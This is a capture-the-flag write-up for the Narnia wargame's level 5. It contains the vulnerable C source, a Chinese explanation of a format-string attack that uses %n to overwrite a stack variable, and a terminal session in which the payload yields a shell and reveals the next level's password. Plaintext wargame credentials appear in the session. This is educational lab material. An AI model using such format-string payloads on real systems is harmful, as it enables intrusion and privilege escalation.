/** narnia5.c */
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv){
int i = 1;
char buffer[64];
snprintf(buffer, sizeof buffer, argv[1]);
buffer[sizeof (buffer) - 1] = 0;
printf("Change i's value from 1 -> 500. ");
if(i==500){
printf("GOOD\n");
system("/bin/sh");
}
printf("No way...let me give you a hint!\n");
printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
printf ("i = %d (%p)\n", i, &i);
return 0;
}
棧環境
格式化漏洞,在調用snprintf之前棧環境如上圖所示,
第一個參數爲buffer的地址 這裏爲0xffffd01c
第二個參數爲buffer的長度 這裏爲0x40 既64字節
第三個參數爲格式化串的地址 這裏爲0xffffd2f5
我們輸入的格式化串爲 python -c 'print "\xcc\xd5\xff\xff" + "%496x" + "%5$n"'
本來按照snprintf的格式, 格式化串後面應該帶兩個參數的, 一個是整型值, 對應%496x, 另一個是指向整型值的指針,對應%5$n
這樣就可以解釋爲: 把i的地址0xffffd5cc輸入到buffer中, 把圖中argument 1的值以16進制的形式輸出,並且補足496字節,這樣snprintf就輸出了500字節
雖然只有64字節填入buffer中, 並且把snprintf輸出的總字節數,既500寫入到第五個argument指針指向的值處,第五個argument就是buffer的首地址
內容是i的地址, 最終就是把i的值改爲500
root@today:~# ssh [email protected]
[email protected]'s password: faimahchiy
narnia5@melinda:~$ cd /tmp/shadowcoder5
narnia5@melinda:/tmp/shadowcoder5$ ls
narnia5 narnia5.c sleep.sh
narnia5@melinda:/tmp/shadowcoder5$ /narnia/narnia5 `python -c 'print "\xff\xff\xff\xff" + "%496x" + "%5$n"'`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [���� �] (34)
i = 1 (0xffffd5cc)
narnia5@melinda:/tmp/shadowcoder5$ /narnia/narnia5 `python -c 'print "\xcc\xd5\xff\xff" + "%496x" + "%5$n"'`
Change i's value from 1 -> 500. GOOD
$ whoami
narnia6
$ cat /etc/narnia_pass/narnia6
neezocaeng
$